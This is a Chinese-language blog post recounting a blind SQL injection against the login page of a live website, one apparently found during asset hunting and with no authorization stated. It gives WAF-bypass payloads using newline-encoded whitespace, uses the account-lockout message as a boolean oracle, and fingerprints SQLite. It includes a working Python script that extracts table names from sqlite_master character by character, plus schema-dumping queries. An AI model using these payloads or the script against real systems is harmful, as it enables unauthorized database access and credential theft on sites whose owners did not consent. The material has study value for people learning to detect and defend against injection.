<!DOCTYPE html><html><head><meta name="generator" content="Hexo 3.8.0"><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="一次奇葩的SQL注入经历"><meta name="keywords" content="mysql注入"><meta name="author" content="rootrain"><meta name="copyright" content="rootrain"><title>一次奇葩的SQL注入经历 | rootrain's Home</title><link rel="shortcut icon" href="/melody-favicon.ico"><link rel="stylesheet" href="/css/index.css?version=1.6.1"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.6.1"><link rel="dns-prefetch" href="https://cdn.staticfile.org"><link rel="dns-prefetch" href="https://cdn.bootcss.com"><link rel="dns-prefetch" href="https://creativecommons.org"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  copy: {
    success: 'Copy successfully',
    error: 'Copy error',
    noSupport: 'The browser does not support'
  }
} </script></head><body><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar"><div class="toggle-sidebar-info text-center"><span data-toggle="Toggle article">Toggle site</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">Catalog</div><div class="sidebar-toc__progress"><span class="progress-notice">You've read</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#判断注入"><span class="toc-number">1.</span> <span class="toc-text">判断注入</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#盲注暴力猜解"><span class="toc-number">2.</span> <span class="toc-text">盲注暴力猜解</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#理性分析"><span class="toc-number">3.</span> <span class="toc-text">理性分析</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#确定数据库"><span class="toc-number">4.</span> <span class="toc-text">确定数据库</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#小结"><span class="toc-number">5.</span> <span class="toc-text">小结</span></a></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="/img/avatar.png"></div><div class="author-info__name text-center">rootrain</div><div class="author-info__description text-center"></div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">Articles</span><span class="pull-right">6</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">Tags</span><span class="pull-right">3</span></a><a class="author-info-articles__categories article-meta" href="/categories"><span class="pull-left">Categories</span><span class="pull-right">4</span></a></div></div></div><div id="content-outer"><div class="no-bg" id="top-container"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">rootrain's Home</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus"><a class="site-page" href="/">Home</a><a class="site-page" href="/archives/">Archives</a><a class="site-page" href="/tags/">Tags</a><a class="site-page" href="/categories/">Categories</a></span></div><div id="post-info"><div id="post-title">一次奇葩的SQL注入经历</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2019-06-08</time><span class="post-meta__separator">|</span><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/注入/">注入</a></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><p>一次奇葩的SQL注入经历。</p>
<p>在寻找资产的时候发现了这个奇葩的站，里面有许多坑。</p>
<a id="more"></a>
<h1 id="判断注入"><a href="#判断注入" class="headerlink" title="判断注入"></a>判断注入</h1><p>输入admin’ admin’’  时可以发现，加一个单引号会出现”出错提示”</p>
<p><img src="/images/hard-sql/1.png" alt></p>
<p><img src="/images/hard-sql/2.png" alt></p>
<p>302跳转后显示</p>
<p><img src="/images/hard-sql/3.png" alt></p>
<p>一个单引号与两个单引号的返回结果不同，大致可以判断出存在注入。</p>
<p>既然是单引号闭合的，那么可以用and或者or语句进行语句闭合，尝试确定注入的存在。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">aaaaaa&apos; or &apos;&apos;=&apos;</span><br><span class="line">aaaaaa&apos; or &apos;a&apos;=&apos;</span><br></pre></td></tr></table></figure>
<p>当尝试这两条语句的时候都返回了出错提示，初步判断存在waf。</p>
<p>尝试使用%0a %0b %0c %0d %09去绕过空格。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">aaaaaa&apos;%0aor%0a&apos;&apos;=&apos;---------True</span><br><span class="line">aaaaaa&apos;%0aor%0a&apos;a&apos;=&apos;--------False</span><br><span class="line">aaaaaa&apos;%0a--%0a-------------Error  #可能是waf，可能是不支持的注释方法</span><br><span class="line">aaaaaa&apos;%0a%23---------------Error</span><br></pre></td></tr></table></figure>
<p>然后可以发现两个请求的结果都是一样的。我们可以想到用户锁定应该是跟用户名有关，之前的测试中进行了弱口令测试，可能会导致锁定，影响注入结果。</p>
<p>经过fuzz得知存在admin，test这两个用户，用户锁定功能仅针对存在的用户进行锁定，不存在的用户是不会出现被锁定的。那么我们只需要改变用户名即可。</p>
<p><img src="/images/hard-sql/7.png" alt></p>
<p><img src="/images/hard-sql/8.png" alt="1559183667469"></p>
<p>到这里，就一共有3个回显信息：</p>
<p>1）用户名锁定–&gt;true</p>
<p>2）用户名或密码错误–&gt;false</p>
<p>3）出现错误–&gt;error or false</p>
<p>这三种回显中，1)代表真，后面的2) 为假，3)可能为假或语句错误，当不存该表或者该列的时候，语句报错，也就是出错了，就会返回3)，而不是2)。</p>
<h1 id="盲注暴力猜解"><a href="#盲注暴力猜解" class="headerlink" title="盲注暴力猜解"></a>盲注暴力猜解</h1><p>然后通过true or false跑表名</p>
<p><img src="/images/hard-sql/9.png" alt></p>
<p>sqlmap的字典只能跑出一个表，接着跑字段。</p>
<p>这里需要注意的是，要避免当前表跟webuser表的列名影响，使用别名的方式进行猜解。</p>
<p>使用别名的方式是没有password字段的</p>
<p><img src="/images/hard-sql/10.png" alt></p>
<p>但是不使用别名会有password字段</p>
<p><img src="/images/hard-sql/11.png" alt></p>
<p>到这里都还算正常，接下来就开始不正常了</p>
<p>猜解当前表的密码，无论是那个字符都报错</p>
<p>记住这里，标记flag</p>
<p><img src="/images/hard-sql/13.png" alt></p>
<p><img src="/images/hard-sql/14.png" alt></p>
<p>经过测试发现，”出现错误”主要是由于语句报错的原因造成的，所以还是需要以用户名锁定为真的结果进行布尔盲注。</p>
<p>但是问题又来了，为什么使用substr无法枚举出数据进行比较呢？</p>
<p>问了一位师傅，给出了以下回答</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">第一种可能</span><br><span class="line">select * from 当前用户表 where 5&gt;(select 次数 from 记录登录次数的表 where username=&apos;test&apos;)  and username=&apos;test&apos; and password=&apos;&apos;</span><br><span class="line"></span><br><span class="line">第二种可能</span><br><span class="line">select * from 当前用户表 join 用户规则表 on id=id where 当前用户表=&apos;test&apos; and 当前用户表.password=&apos;&apos; and </span><br><span class="line"></span><br><span class="line">第三种可能</span><br><span class="line"></span><br><span class="line">$user=(select * from 当前用户表 where username=&apos;&apos;)</span><br><span class="line">$登录次数=（select * from 次数表 where username=&apos;&apos;）</span><br><span class="line">……</span><br><span class="line">一些判断或操作</span><br><span class="line">最后才是登录</span><br></pre></td></tr></table></figure>
<p>现在仍未知道是什么数据库，没有常见四大数据库函数，无法判断数据库类型。</p>
<p>还有不使用别名进行猜解，也能出来结果，按理说报字段不明确，但是</p>
<p><img src="/images/hard-sql/15.png" alt></p>
<p>a开头报错</p>
<p><img src="/images/hard-sql/17.png" alt></p>
<p>通过like可以爆出username。</p>
<h1 id="理性分析"><a href="#理性分析" class="headerlink" title="理性分析"></a>理性分析</h1><p>1.如果webuser不是当前表，那么select username from webuser应该会爆字段不明确，正确写法应该是select webuser.username from webuser才对。</p>
<p>2.当我指定为webuser.username</p>
<p><img src="/images/hard-sql/18.png" alt></p>
<p>显示也可以注入，那么可以推断webuser是当前表?在查询的时候不是跨表查询，所以不会报错，而且webuser.username与username的数据是一致的，因此推断该当前表应该是webuser。</p>
<p>3.找到上文的flag，当前表是有password字段的，但是使用了别名方式查询就没有password字段，说明当前表并没有password字段。</p>
<p>4.大概率注入的点在锁定用户的表，当如果锁定用户的表没有数据，也就是没有用户被锁定的情况下，就算是语句正确，注入成功也会爆false，也就是用户密码错误</p>
<p>判断真假的页面在302跳转后，所以在使用Python的时候会非常不方便，requests、hackhttp都无法获取我想要的数据，只能用burp，但是线程只能调为1，且要勾上跳转</p>
<p><img src="/images/hard-sql/19.png" alt></p>
<p>知道密码不在当前表后，再执着密码已经没有意义了，我们可以尝试其他字段，比如sessionid，尝试是否可以使用sessionid进行登录。</p>
<p>好不容易注出来了，结果还是登录不进系统，应该还是有其他的判断，并不能伪造session登录系统，<strong>无能狂怒1.0</strong>。</p>
<h1 id="确定数据库"><a href="#确定数据库" class="headerlink" title="确定数据库"></a>确定数据库</h1><p>师傅弄了个数据库类型分析小工具，找了一些数据库内置函数，通过内置函数分析当前数据库类型。其实通过cookie也能猜出当前数据库，cookie中包含了django language。sqlite绑定了许多语言，python就是其中一种。</p>
<p><img src="/images/hard-sql/20.png" alt></p>
<p>通过特有函数与表的判断如：sqlite_version、sqlite_master，判断出了当前数据库为sqlite。</p>
<p>知道数据库类型之后就好办了，使用特定语句即可</p>
<p>猜表</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select substr(tbl_name,0,1) from sqlite_master limit 0,1)=&apos;A&apos;</span><br></pre></td></tr></table></figure>
<p>简单写了个脚本跑，但是要注意的事，这个站很坑，线程必须1，必须要延时，不能过快，否则会抽风。抽风的情况就是不返回用户被锁定或者用户名密码错误，无法判断真假。</p>
<p>脚本还需要注意的就是：</p>
<p>1)由于网站是https的，必须要先下载该网站的证书，通过verify加载才可以正常访问</p>
<p>2)allow_redirects=True，允许跳转，否则只能捕获到302的包</p>
<p>3)sqlite区分大小写，所以要将大写也列入payload中</p>
<p>4)encode(‘utf-8’)处理中文，否则type为unincode，无法匹配到中文</p>
<p>5)延时0.6秒</p>
<p>脚本遍历limit就行，不再写一个循环的原因还是因为抽风的存在，就算是延时2秒也不能保证不会抽风。还有就是用户锁定时长大概是5-10分钟，具体没有去计。过了时间之后还得继续让一个用户锁定，所以只能手动改猜第几个表。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#coding=utf-8</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line"></span><br><span class="line">url = <span class="string">"https://f4ckyouthewebsite/usrlgin?pass=1&amp;username=fuckyou"</span></span><br><span class="line">s = requests.Session()</span><br><span class="line">data = <span class="string">""</span></span><br><span class="line">payloads = list(<span class="string">'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.'</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> x <span class="keyword">in</span> range(<span class="number">25</span>):</span><br><span class="line">    <span class="keyword">for</span> payload <span class="keyword">in</span> payloads:</span><br><span class="line">    	uri = <span class="string">"%27%0aor%0a(select%0asubstr(tbl_name,"</span>+str(x)+<span class="string">",1)%0afrom%0asqlite_master%0alimit%0a0,1)='"</span>+payload+<span class="string">"'%0aor%0a%271%27=%27&amp;getLock=t&amp;ptype=0&amp;overrideLock=&amp;orl=&amp;password=test123"</span></span><br><span class="line">        res = s.get(url+uri,verify=<span class="string">'4444.cer'</span>,allow_redirects=<span class="literal">True</span>).text</span><br><span class="line">        res = res.encode(<span class="string">'utf-8'</span>)</span><br><span class="line">        <span class="keyword">if</span> <span class="string">"用户被锁定"</span> <span class="keyword">in</span> res:</span><br><span class="line">            <span class="keyword">print</span> payload</span><br><span class="line">            data += payload</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">        time.sleep(<span class="number">0.6</span>)</span><br><span class="line">        <span class="keyword">print</span> <span class="string">"[in processing]:"</span>+data</span><br></pre></td></tr></table></figure>
<p>于是拿到用户表，其中发现存在userblacklist的表，那就与推测一致了，会先查询该表是否有数据，如果没有数据直接就跳到密码验证。</p>
<p>师傅叫我先跑密码，我没有听。我觉得不用操之过急，先把表名跑完了再跑密码也不迟。</p>
<p>晚上11:30，漏洞修复。</p>
<p><strong>无能狂怒2.0</strong></p>
<p>给出密码猜解的方法，弄了好久，才发现是被修复了，并不是语句有问题。</p>
<p>sqlite查询sql的值来得出字段的，里面的数据类似于创建语句如:CREATE TABLE….</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">select (SELECT substr(sql,1,1) FROM sqlite_master WHERE type!=&apos;meta&apos; AND name=&apos;demo&apos;)=&apos;C&apos;</span><br><span class="line"></span><br><span class="line">SELECT(SELECT substr(sql,1,1) FROM sqlite_master WHERE type!=&apos;meta&apos; AND name=&apos;demo&apos;) like &apos;C&apos;</span><br><span class="line"></span><br><span class="line">SELECT substr(sql,1,1) FROM sqlite_master WHERE type=&apos;table&apos; limit 0,1</span><br><span class="line"></span><br><span class="line">SELECT sql FROM sqlite_master where name = &apos;demo&apos;</span><br></pre></td></tr></table></figure>
<h1 id="小结"><a href="#小结" class="headerlink" title="小结"></a>小结</h1><p>这次注入虽然没能有好的收获，但是也学习到不少知识。</p>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">Author: </span><span class="post-copyright-info"><a href="mailto:undefined">rootrain</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">Link: </span><span class="post-copyright-info"><a href="https://rootrain.me/2019/06/08/一次奇葩的SQL注入经历/">https://rootrain.me/2019/06/08/一次奇葩的SQL注入经历/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">Copyright Notice: </span><span class="post-copyright-info">All articles in this blog are licensed under <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> unless stating additionally.</span></div></div><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/mysql注入/">mysql注入</a></div><nav id="pagination"><div class="prev-post pull-left"><a href="/2019/06/08/一次简单的sql注入经历/"><i class="fa fa-chevron-left">  </i><span>一次简单的SQL注入经历</span></a></div><div class="next-post pull-right"><a href="/2019/05/21/一次内部练习/"><span>一次内部练习</span><i class="fa fa-chevron-right"></i></a></div></nav></div></div><footer><div class="layout" id="footer"><div class="copyright">&copy;2019 By rootrain</div><div class="framework-info"></div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.6.1"></script><script src="/js/fancybox.js?version=1.6.1"></script><script src="/js/sidebar.js?version=1.6.1"></script><script src="/js/copy.js?version=1.6.1"></script><script src="/js/fireworks.js?version=1.6.1"></script><script src="/js/transition.js?version=1.6.1"></script><script src="/js/scroll.js?version=1.6.1"></script><script src="/js/head.js?version=1.6.1"></script><script>if(/Android|webOS|iPhone|iPod|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
}</script></body></html>